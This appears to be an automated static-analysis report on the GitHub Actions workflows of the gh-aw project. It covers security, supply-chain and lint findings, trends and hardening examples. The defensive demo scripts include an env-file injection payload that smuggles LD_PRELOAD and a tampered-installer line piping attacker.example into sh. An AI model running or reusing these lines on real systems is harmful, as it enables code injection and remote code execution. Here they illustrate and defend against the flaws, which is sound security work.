
[static-analysis] Report - 2026-05-26 #34884

@github-actions


Analysis Summary

  • Tools Used: zizmor, poutine, actionlint, runner-guard
  • Total Findings: 1,672
  • Workflows Scanned: 236
  • Workflows Affected: 236 (actionlint has at least one issue in every workflow; 46 trigger zizmor; 12 trigger poutine; 15 trigger runner-guard)
  • Status: Stable — runner-guard counts unchanged from 2026-05-24; 2 persistent High github-env zizmor findings on dev-hawk.lock.yml remain.

Findings by Tool

| Tool | Total | Critical | High | Medium | Low / Note / Info |
|---|---|---|---|---|---|
| zizmor (security) | 73 | 0 | 2 | 2 | 69 |
| poutine (supply chain) | 24 | 0 | 12 (error) | 0 | 12 (notes/warning) |
| actionlint (linting) | 1,293 (errors; actionlint does not grade severity) | n/a | n/a | n/a | n/a |
| runner-guard (taint analysis) | 282 | 0 | 273 | 9 | 0 |

Clustered Findings by Tool and Type

Zizmor Security Findings

| Issue Type | Severity | Count | Affected Workflows |
|---|---|---|---|
| github-env | High | 2 | dev-hawk.lock.yml (lines 734, 1579) |
| excessive-permissions | Medium | 1 | dependabot-repair.lock.yml |
| artipacked | Medium | 1 | daily-geo-optimizer.lock.yml |
| obfuscation | Low | 25 | 25 workflows (`GH_AW_WIKI_NOTE: ${{ '' }}` pattern) |
| template-injection | Low | 4 | daily-otel-instrumentation-advisor, daily-reliability-review, daily-token-consumption-report, deep-report |
| template-injection | Informational | 39 | ai-moderator (×3), contribution-check (×2), and others |
| superfluous-actions | Informational | 1 | 1 workflow |

Poutine Supply Chain Findings

| Issue Type | Severity | Count | Affected Workflows |
|---|---|---|---|
| untrusted_checkout_exec | error | 12 | dependabot-worker.lock.yml, smoke-workflow-call.lock.yml, smoke-workflow-call-with-inputs.lock.yml (4 each) |
| github_action_from_unverified_creator_used | note | 9 | link-check.yml, hippo-embed.lock.yml, super-linter.lock.yml, smoke-codex.lock.yml (×2), agentic-token-audit.lock.yml, dataflow-pr-discussion-dataset.lock.yml, mcp-inspector.lock.yml, copilot-setup-steps.yml |
| unverified_script_exec | note | 2 | smoke-codex.lock.yml, copilot-setup-steps.yml |
| pr_runs_on_self_hosted | warning | 1 | smoke-copilot-arm.lock.yml |

Actionlint Linting Issues

| Issue Type | Count | Notes |
|---|---|---|
| shellcheck | 930 | Mostly SC2086 (word splitting) and SC2016 (single-quote expansion) info-level findings |
| syntax-check | 236 | Mostly `queue: max` on `concurrency:` (unexpected key) across compiled workflows |
| permissions | 111 | Permission spec lint warnings |
| expression | 16 | GitHub Actions expression syntax issues |

Runner-Guard Taint Analysis Findings

| Rule ID | Name | Severity | Count | Affected Workflows |
|---|---|---|---|---|
| RGS-004 | Comment-Triggered Workflow Without Author Authorization Check | High | 260 | q.lock.yml (112), ai-moderator.lock.yml (79), dev-hawk.lock.yml (69) |
| RGS-012 | Secret Exfiltration via Outbound HTTP Request | High | 7 | daily-model-inventory.lock.yml (3), visual-regression-checker.lock.yml (2), daily-multi-device-docs-tester.lock.yml, docs-noob-tester.lock.yml |
| RGS-018 | Suspicious Payload Execution Pattern | High | 6 | copilot-setup-steps.yml, daily-cli-performance.lock.yml, daily-sentrux-report.lock.yml, go-logger.lock.yml, smoke-claude.lock.yml, smoke-codex.lock.yml |
| RGS-005 | Excessive Permissions on Untrusted Trigger | Medium | 8 | ai-moderator.lock.yml (4), q.lock.yml (3), agentic_commands.yml |
| RGS-019 | Step Output Interpolated in run Block | Medium | 1 | error-message-lint.yml (line 50) |

Issues created this run: none (all Critical/High findings are covered by prior closed rule-level issues — see Phase 6 deduplication section below).

Top Priority Issues

1. RGS-004 — Comment-Triggered Workflow Without Author Authorization Check

2. Zizmor github-env (High) — persistent regression on dev-hawk.lock.yml

  • Tool: zizmor
  • Severity: High
  • Count: 2 (lines 734 and 1579)
  • Affected: dev-hawk.lock.yml
  • Impact: Dangerous use of environment file (e.g., writing untrusted content to $GITHUB_ENV) can lead to privilege escalation or command injection.
  • Status: Persisting since 2026-05-23 (cleared on 2026-05-22, reappeared 2026-05-23, still present today).
  • Reference: (docs.zizmor.sh/redacted)
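To make the github-env impact concrete, here is an added illustration (not code from the report, from dev-hawk.lock.yml or from gh-aw) of why zizmor treats `echo "NAME=$value" >> "$GITHUB_ENV"` with an attacker-influenced value as dangerous, beside the heredoc form that contains it. The script emulates how the runner reads the env file (NAME=value lines and NAME<<DELIM blocks); that emulation is an assumption made for the demo, not the runner's own code. The payload, variable names and file handling are constructed for the example.

```sh
#!/bin/sh
# Added example: untrusted value written to $GITHUB_ENV. Not code from gh-aw or the report.
set -eu

# Constructed attacker-controlled value (e.g. a PR title that reaches the step via env:).
# The embedded newline smuggles a second NAME=value line into the env file, so a later
# step in the job starts with LD_PRELOAD set by the attacker.
EVIL_TITLE='Fix typo
LD_PRELOAD=/tmp/evil.so'

# Vulnerable pattern flagged by zizmor github-env:
#   run: echo "PR_TITLE=$PR_TITLE" >> "$GITHUB_ENV"
unsafe_export() {  # $1=name $2=value $3=env file
  echo "$1=$2" >> "$3"
}

# Hardened pattern: heredoc syntax with an unguessable delimiter, so newlines in the
# value stay inside the value and cannot start a new assignment.
safe_export() {  # $1=name $2=value $3=env file
  delim="ghadelim_$(od -An -N16 -tx1 /dev/urandom | tr -d ' \n')"
  printf '%s<<%s\n%s\n%s\n' "$1" "$delim" "$2" "$delim" >> "$3"
}

# Emulation (assumption, for the demo) of how the runner reads the file: whichever of
# '=' or '<<' appears first on a line decides between NAME=value and a NAME<<DELIM
# block. Prints one variable name per assignment the runner would apply.
list_assignments() {  # $1=env file
  while IFS= read -r line || [ -n "$line" ]; do
    eq=${line%%=*}
    hd=${line%%<<*}
    if [ "$eq" != "$line" ] && { [ "$hd" = "$line" ] || [ ${#eq} -lt ${#hd} ]; }; then
      echo "$eq"
    elif [ "$hd" != "$line" ]; then
      delim=${line#*<<}
      while IFS= read -r body && [ "$body" != "$delim" ]; do :; done
      echo "$hd"
    fi
  done < "$1"
}

# Demo: the same payload through both writers.
demo() {
  f=$(mktemp); g=$(mktemp)
  unsafe_export PR_TITLE "$EVIL_TITLE" "$f"
  safe_export   PR_TITLE "$EVIL_TITLE" "$g"
  echo "unsafe: $(list_assignments "$f" | tr '\n' ' ')"   # unsafe: PR_TITLE LD_PRELOAD
  echo "safe:   $(list_assignments "$g" | tr '\n' ' ')"   # safe:   PR_TITLE
  rm -f "$f" "$g"
}
demo
```

Passing the value through `env:` instead of `${{ }}` interpolation stops shell injection into the `run` script, but it does not by itself protect `$GITHUB_ENV`; only the delimited form (or not writing untrusted content to the env file at all) does. When reviewing lines 734 and 1579, check which of the two shapes each write uses.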

3. Poutine untrusted_checkout_exec (error) — 12 occurrences

  • Tool: poutine
  • Severity: error
  • Count: 12
  • Affected: dependabot-worker.lock.yml, smoke-workflow-call.lock.yml, smoke-workflow-call-with-inputs.lock.yml (4 each)
  • Impact: Arbitrary code execution from untrusted code changes. All occurrences are already annotated with # poutine:ignore untrusted_checkout_exec (so they may be acknowledged false positives), but the rule still reports them.
  • Reference: https://github.com/boostsecurityio/poutine

Fix Suggestion for obfuscation (Zizmor Low, 25 occurrences)

Selected because it is the largest single rule cluster generated by gh-aw's own templates and a mechanical fix would clean up 25 lock files at once.

Issue: zizmor `obfuscation`: `GH_AW_WIKI_NOTE: ${{ '' }}` is flagged as obfuscated usage of GitHub Actions expression syntax.
Severity: Low
Affected Workflows: 25

Prompt to Copilot Agent:

You are fixing a zizmor `obfuscation` warning in the gh-aw compiler.

**Vulnerability**: obfuscation — obfuscated usage of GitHub Actions features
**Rule**: zizmor `obfuscation` — (docs.zizmor.sh/redacted)

**Current Issue**:

The compiled `.lock.yml` files generated by gh-aw contain a step env block that emits a literal empty value using a GitHub Actions expression:

```yaml
env:
  GH_AW_GITHUB_RUN_ID: ${{ github.run_id }}
  GH_AW_GITHUB_WORKSPACE: ${{ github.workspace }}
  GH_AW_WIKI_NOTE: ${{ '' }}
```

zizmor flags `${{ '' }}` as an obfuscated expression — there is no reason to wrap an empty string in a `${{ }}` expression block; it just confuses readers and static analyzers, and matches patterns attackers use to hide intent.

**Required Fix**:

1. Identify the gh-aw compiler/template code that emits `GH_AW_WIKI_NOTE: ${{ '' }}`. Likely candidates: `pkg/workflow/*.go` step-render helpers, or the wiki-note injection template.
2. When the wiki-note value is empty, **omit the env var entirely** instead of emitting an empty string expression. If the var must always be present (e.g., the consuming script tolerates missing better than empty), emit a literal empty string with no expression: `GH_AW_WIKI_NOTE: ""`.
3. Re-compile all `.lock.yml` files (`make recompile` or equivalent) and verify the warning is gone.

**Before**:
```yaml
env:
  GH_AW_WIKI_NOTE: ${{ '' }}
```

**After (preferred — omit when empty)**:
```yaml
env:
  # GH_AW_WIKI_NOTE omitted when value is empty
```

**After (alternative — literal empty string)**:
```yaml
env:
  GH_AW_WIKI_NOTE: ""
```

**Affected workflows** (all 25 will be regenerated from the same template — fix the template, not each lock file by hand):
- agent-performance-analyzer, agentic-token-audit, agentic-token-optimizer, audit-workflows
- copilot-agent-analysis, copilot-cli-deep-research, copilot-pr-nlp-analysis, copilot-pr-prompt-analysis, copilot-session-insights
- daily-cli-performance, daily-code-metrics, daily-news, daily-sentrux-report, daily-testify-uber-super-expert
- dataflow-pr-discussion-dataset, deep-report, delight, discussion-task-miner, firewall-escape
- grumpy-reviewer, issue-triage-agent, mattpocock-skills-reviewer, metrics-collector, pr-code-quality-reviewer, pr-nitpick-reviewer, pr-triage-agent
- security-compliance, security-review, sergo, smoke-agent-all-merged, smoke-agent-all-none
- smoke-agent-public-approved, smoke-agent-public-none, smoke-agent-scoped-approved
- smoke-ci, smoke-codex, smoke-service-ports, workflow-health-manager

**Verification**: After the fix, re-run the static analysis report workflow and confirm `zizmor obfuscation` finding count drops from 25 to 0.

Detailed Findings by Workflow

High-severity highlights

dev-hawk.lock.yml

  • zizmor github-env (High) at lines 734, 1579 — dangerous use of environment file
  • runner-guard RGS-004 (High) ×69 — comment-triggered workflow without author authorization
  • runner-guard RGS-005 (Medium) — excessive permissions on untrusted trigger (covered indirectly)

q.lock.yml

  • runner-guard RGS-004 (High) ×112 across many step boundaries (from line 137 onward, past line 600)
  • runner-guard RGS-005 (Medium) ×3 at workflow root

ai-moderator.lock.yml

  • runner-guard RGS-004 (High) ×79
  • runner-guard RGS-005 (Medium) ×4
  • zizmor template-injection (Informational) ×3 at line 716 (Start MCP Gateway step)

daily-model-inventory.lock.yml

  • runner-guard RGS-012 (High) ×3 at lines 1009, 1175, 1239 — outbound HTTP requests to non-GitHub domains with secret access

visual-regression-checker.lock.yml

  • runner-guard RGS-012 (High) ×2 at lines 439, 809

copilot-setup-steps.yml

  • runner-guard RGS-018 (High) at line 16 — curl ... | bash install pattern
  • poutine unverified_script_exec (note) at line 17 — same install pattern
  • poutine github_action_from_unverified_creator_used (note) at line 43 — astral-sh/setup-uv
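A replacement for the `curl ... | bash` install step that RGS-018 and poutine unverified_script_exec both flag at lines 16 and 17, as an added example (not code from copilot-setup-steps.yml or the repository): fetch the installer to a file, check it against a pinned SHA-256 digest, and execute only on a match. The URL and digest variable names are placeholders; the offline demo uses a constructed installer and the well-known digest of the string `hello` plus newline. A real pin is the digest of one specific released installer, recorded in the repository next to the version it belongs to.

```sh
#!/bin/sh
# Added example, not code from the repository. Replaces `curl -fsSL URL | bash` with
# download -> pin check -> execute, so a changed upstream script fails closed.
set -eu

# SHA-256 of a file; portable across GNU coreutils (sha256sum) and BSD/macOS (shasum).
sha256_of() {  # $1=file
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# Returns 0 only if the file matches the pinned digest.
verify_sha256() {  # $1=file $2=expected hex digest
  [ "$(sha256_of "$1")" = "$2" ]
}

# Verify a downloaded installer against its pin and run it only on a match.
# Returns the installer's exit status if it ran, 1 if the digest did not match
# (in which case nothing was executed).
run_verified() {  # $1=installer file $2=pinned digest
  if verify_sha256 "$1" "$2"; then
    sh "$1"
  else
    echo "refusing to run $1: digest mismatch" >&2
    return 1
  fi
}

# Workflow-step wrapper (placeholder variables; not exercised offline):
#   tmp=$(mktemp)
#   curl -fsSL --proto '=https' --tlsv1.2 -o "$tmp" "$INSTALLER_URL"
#   run_verified "$tmp" "$INSTALLER_SHA256"
# A silently modified upstream script then fails the step instead of executing with
# the runner's token and secrets in scope.

# Digest of "hello\n", used as a constant check that the hashing helper is correct.
PINNED_HELLO='5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03'

# Offline demo with a constructed installer. The pin is taken from the reviewed copy,
# which is what a maintainer does once when bumping the installer version.
demo() {
  inst=$(mktemp)
  printf 'hello\n' > "$inst"
  verify_sha256 "$inst" "$PINNED_HELLO" && echo "hash helper agrees with known digest"
  printf 'echo installed\n' > "$inst"
  pin=$(sha256_of "$inst")                 # record the pin from the reviewed script
  run_verified "$inst" "$pin"              # prints: installed
  printf 'echo installed\ncurl -s https://attacker.example/x | sh\n' > "$inst"
  run_verified "$inst" "$pin" 2>/dev/null || echo "tampered installer: blocked"
  rm -f "$inst"
}
demo
```

Where the upstream project publishes a signed checksum file, verify that signature before trusting the digest; where it only publishes a version, pin the digest yourself at review time. Either way the step no longer runs whatever the URL serves today.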

smoke-workflow-call.lock.yml / smoke-workflow-call-with-inputs.lock.yml / dependabot-worker.lock.yml

  • poutine untrusted_checkout_exec (error) ×4 each — all annotated with # poutine:ignore untrusted_checkout_exec

Actionlint by-type summary

  • shellcheck (930): Top SC codes: SC2086 (Double quote to prevent globbing) and SC2016 (Expressions don't expand in single quotes) — both informational and pervasive in generated run: blocks.
  • syntax-check (236): Each generated .lock.yml reports `unexpected key "queue" for "concurrency" section. expected one of "cancel-in-progress", "group"` (gh-aw's `queue: max` extension is not part of the standard concurrency schema).
  • permissions (111): Workflow permissions linting warnings, scattered across compiled workflows.
  • expression (16): GitHub Actions expression syntax issues, mostly in workflow-skill-extractor.lock.yml.

Historical Trends

Daily trend over the last five scans:

| Date | Workflows | zizmor | poutine | actionlint | runner-guard | Total |
|---|---|---|---|---|---|---|
| 2026-05-21 | 233 | 72 | 21 | 1,285 | 305 | 1,683 |
| 2026-05-22 | 234 | 71 | 21 | 1,286 | 296 | 1,674 |
| 2026-05-23 | 234 | 73 | 21 | 1,284 | 305 | 1,683 |
| 2026-05-24 | 235 | 73 | 21 | 1,289 | 282 | 1,665 |
| 2026-05-26 | 236 | 73 | 24 | 1,293 | 282 | 1,672 |

Delta vs 2026-05-24 (last successful scan; no scan recorded for 2026-05-25):

  • zizmor: 0
  • poutine: +3 (more github_action_from_unverified_creator_used notes: 6 → 9)
  • actionlint: +4 (shellcheck +3, syntax-check +1 with new workflow)
  • runner-guard: 0 (RGS-004=260, RGS-012=7, RGS-018=6, RGS-005=8, RGS-019=1 — all unchanged)
  • Workflows scanned: 235 → 236 (+1 new workflow)

New Issues

None — no new rule types appeared today. The 3-finding poutine bump is the same github_action_from_unverified_creator_used rule on 3 more action references introduced by recent compilation output, not a new rule class.

Resolved Issues

None resolved since 2026-05-24 — the High github-env regression on dev-hawk.lock.yml continues to persist (3 days running) and all runner-guard counts are flat.

Runner-Guard Analysis

  • Total findings: 282 (260 High RGS-004 + 7 High RGS-012 + 6 High RGS-018 + 8 Medium RGS-005 + 1 Medium RGS-019)
  • No score/grade emitted by this run's runner-guard output (the report's narrative summary was not present in the compile log).

Deduplication for issue creation: every Critical/High runner-guard finding today matches a prior closed rule-level issue covering the same rule ID + affected file. Per the dedup policy in the runbook, no new issues are created.

| Rule | Affected file | Prior closed issue |
|---|---|---|
| RGS-004 | q.lock.yml, ai-moderator.lock.yml, dev-hawk.lock.yml | #29694 (16-workflow rollup, closed 2026-05-02) |
| RGS-012 | daily-multi-device-docs-tester.lock.yml | #33477 (closed 2026-05-21) |
| RGS-012 | docs-noob-tester.lock.yml | #28488 / #29178 (closed) |
| RGS-012 | daily-model-inventory.lock.yml | #30776 / #30079 (closed) |
| RGS-012 | visual-regression-checker.lock.yml | #30947 / #28626 (closed) |
| RGS-018 | copilot-setup-steps.yml | #33476 (closed 2026-05-21) |
| RGS-018 | daily-cli-performance.lock.yml, daily-sentrux-report.lock.yml, go-logger.lock.yml, smoke-claude.lock.yml, smoke-codex.lock.yml | #30532 (34-workflow rollup, closed 2026-05-06; explicitly lists all five) |

Issues created: none.

Recommendations

  1. Immediate — Re-investigate the persistent zizmor github-env High finding on dev-hawk.lock.yml:734,1579. It cleared briefly on 2026-05-22, then reappeared and has stayed for 3 days. Likely needs a targeted fix to the dev-hawk template/source.
  2. Short-term — Apply the obfuscation fix in the Fix Suggestion section above to eliminate 25 zizmor Low warnings in a single template change.
  3. Short-term — Triage the 3 new poutine github_action_from_unverified_creator_used notes (now 9 total); pin SHA-locked verified equivalents where possible.
  4. Long-term — RGS-004 (260 occurrences in q/ai-moderator/dev-hawk) keeps recurring despite the fix landed via [static-analysis] RGS-004: Comment-Triggered Workflow Without Author Authorization Check in 16 workflows #29694. Investigate whether the author-association guard is being re-introduced as missing after each rebuild, or whether runner-guard is double-counting steps that already have the guard.
  5. Process — Consider gating compile-time on actionlint syntax-check and zizmor High in CI so regressions like dev-hawk's github-env are caught before merge.
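For recommendation 4, the guard that RGS-004 looks for in comment-triggered workflows, here is an added example (not code from gh-aw, q.lock.yml, ai-moderator.lock.yml or dev-hawk.lock.yml) of an author-association check done as a shell step, with the equivalent job-level `if:` expression in a comment. The allow list, the `author_guard.sh` file name and the `AUTHOR_ASSOCIATION` variable are assumptions for the example; the association values themselves are GitHub's `author_association` enum.

```sh
#!/bin/sh
# Added example, not code from gh-aw: the author check that RGS-004 looks for in
# comment-triggered (issue_comment / pull_request_review_comment) workflows.
set -eu

# Roles allowed to drive the agent. Assumption for this example: adjust to repo policy.
ALLOWED_ASSOCIATIONS='OWNER MEMBER COLLABORATOR'

# Returns 0 if the association is on the allow list, 1 otherwise.
author_allowed() {  # $1=author_association string
  for role in $ALLOWED_ASSOCIATIONS; do
    [ "$1" = "$role" ] && return 0
  done
  return 1
}

# Gate for a workflow step. The value comes from the event payload and is passed
# through env: (it is an enum, so it is safe there) rather than interpolated into
# the script body:
#   env:
#     AUTHOR_ASSOCIATION: ${{ github.event.comment.author_association }}
#   run: |
#     . ./author_guard.sh            # hypothetical file name for this script
#     require_trusted_author "$AUTHOR_ASSOCIATION"
# The equivalent job-level expression, which keeps untrusted jobs from starting at all:
#   if: contains(fromJSON('["OWNER","MEMBER","COLLABORATOR"]'), github.event.comment.author_association)
require_trusted_author() {  # $1=author_association
  if author_allowed "$1"; then
    echo "author association $1: allowed"
    return 0
  fi
  echo "::error::comment author association '$1' is not authorized to trigger this workflow" >&2
  return 1
}

# Constructed inputs, including the values a drive-by commenter would carry.
demo() {
  for a in OWNER MEMBER COLLABORATOR CONTRIBUTOR FIRST_TIME_CONTRIBUTOR NONE MANNEQUIN; do
    if author_allowed "$a"; then echo "$a -> allowed"; else echo "$a -> rejected"; fi
  done
}
demo
```

Two caveats when applying this. The guard must run before any step that checks out, builds or executes content from the commenter's PR, which is why runner-guard counts every unguarded step boundary separately. And `author_association` is not a permission check: on organization repositories COLLABORATOR covers anyone with direct access, including read-only invitees, so where write-level trust is required, resolve the user's actual permission via the collaborator permission API (`gh api repos/$GITHUB_REPOSITORY/collaborators/<login>/permission`) instead of relying on the association string alone.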

Next Steps

References:

Generated by 📊 Static Analysis Report · opus47 20M ·

  • expires on Jun 2, 2026, 6:19 AM UTC
